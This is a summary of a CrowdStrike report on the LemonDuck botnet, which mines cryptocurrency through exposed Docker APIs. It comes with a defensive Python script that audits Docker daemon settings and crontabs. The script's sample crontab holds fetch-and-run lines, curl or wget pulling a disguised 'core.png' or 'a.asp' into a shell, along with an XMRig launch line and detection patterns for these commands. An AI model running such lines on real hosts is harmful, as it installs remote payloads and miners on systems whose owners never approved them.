Company:
Date Published:
Author: CrowdStrike
Word count: 2499
Language: English
Hacker News points: None

Summary

LemonDuck, a well-known cryptomining botnet, is actively targeting publicly exposed Docker APIs on Linux hosts to mine cryptocurrency, capitalizing on rising cryptocurrency prices and growing enterprise cloud adoption. The campaign abuses misconfigured cloud instances whose Docker API is reachable from the internet to start malicious containers; these download scripts disguised with innocuous file names such as "core.png" and "a.asp", which in turn install cron jobs that launch the XMRig miner. To evade detection, LemonDuck disables Alibaba Cloud's monitoring service and mines through proxy pools, so the operators' actual wallet addresses never appear in the miner configuration. Unlike most other mining campaigns, it also moves laterally, using SSH keys found on the compromised host to reach other machines. CrowdStrike's Falcon platform provides runtime protection for container environments and uses machine learning models to detect this class of threat.
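The two conditions the summary hinges on, an unauthenticated Docker API exposed over TCP and a cron job that pulls a remote "image" file and hands it to a shell, are both cheap to audit on a host. The following is an added example written for this page, not CrowdStrike's code or anything from the article: it checks a Docker `daemon.json` for TCP listeners without `tlsverify` (the `hosts`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` keys are Docker's documented daemon settings) and scans a crontab for remote-fetch-to-shell patterns, disguised payload extensions, and references to xmrig. The sample configs and cron lines are constructed; only the file names `core.png` and `a.asp` come from the summary, and the IP addresses are RFC 5737 documentation addresses.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed sample daemon.json contents (assumptions for this example, not taken from any real host).
# The weak config exposes the Docker API on the plain-text port 2375 with no client-certificate check.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
# The hardened config keeps the TCP listener (port 2376 is the conventional TLS port) but requires
# mutual TLS, so an anonymous client cannot create containers.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed crontab; line 1 is a comment, line 2 is benign, lines 3-5 mirror the summary's
# download-disguised-script-then-mine pattern.
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/5 * * * * curl -fsSL http://198.51.100.7/core.png | bash",
    "*/10 * * * * wget -q -O /tmp/a.asp http://203.0.113.9/a.asp && sh /tmp/a.asp",
    "0 * * * * /opt/xmrig/xmrig --config=/opt/xmrig/config.json",
])

# curl/wget followed (in the same command) by an http(s) URL.
REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*https?://\S+")
# A shell invoked after a pipe or command separator: "| bash", "&& sh /tmp/x", "; dash ...".
SHELL_EXEC = re.compile(r"(?:\|\s*|&&\s*|;\s*)(?:ba|da)?sh\b")
# A fetched URL whose extension says "image/web page" rather than "script".
NON_SCRIPT_EXT = re.compile(r"https?://\S+\.(?:png|jpe?g|gif|asp|aspx|jsp)\b", re.IGNORECASE)
MINER = re.compile(r"xmrig", re.IGNORECASE)


def audit_daemon_config(raw_json: str) -> List[str]:
    """Return findings for a Docker daemon.json that exposes the API over TCP insecurely."""
    cfg: Dict = json.loads(raw_json)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    findings: List[str] = []
    if not tcp_hosts:
        return findings  # unix socket only: not reachable over the network
    if not cfg.get("tlsverify"):
        findings.append(
            "Docker API listens on TCP without client-certificate verification: "
            + ", ".join(tcp_hosts)
        )
    else:
        missing = [k for k in ("tlscacert", "tlscert", "tlskey") if not cfg.get(k)]
        if missing:
            findings.append("tlsverify is set but certificate paths are missing: " + ", ".join(missing))
    return findings


def audit_crontab(text: str) -> List[Tuple[int, str]]:
    """Return (line number, reason) pairs for cron entries matching the miner-dropper pattern."""
    findings: List[Tuple[int, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        cmd = line.strip()
        if not cmd or cmd.startswith("#"):
            continue
        if REMOTE_FETCH.search(cmd) and SHELL_EXEC.search(cmd):
            findings.append((lineno, "remote-fetch-to-shell"))
            if NON_SCRIPT_EXT.search(cmd):
                findings.append((lineno, "disguised-script-extension"))
        if MINER.search(cmd):
            findings.append((lineno, "xmrig-reference"))
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(raw))
    for lineno, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {lineno}: {reason}")
```

On a live host you would feed `/etc/docker/daemon.json` and the output of `crontab -l` (plus `/etc/cron.d/*`) into the two functions. The crontab check is a heuristic: it catches the download-and-execute shape described above but not a payload that is already on disk under a benign name, which is why runtime visibility into what containers actually execute still matters.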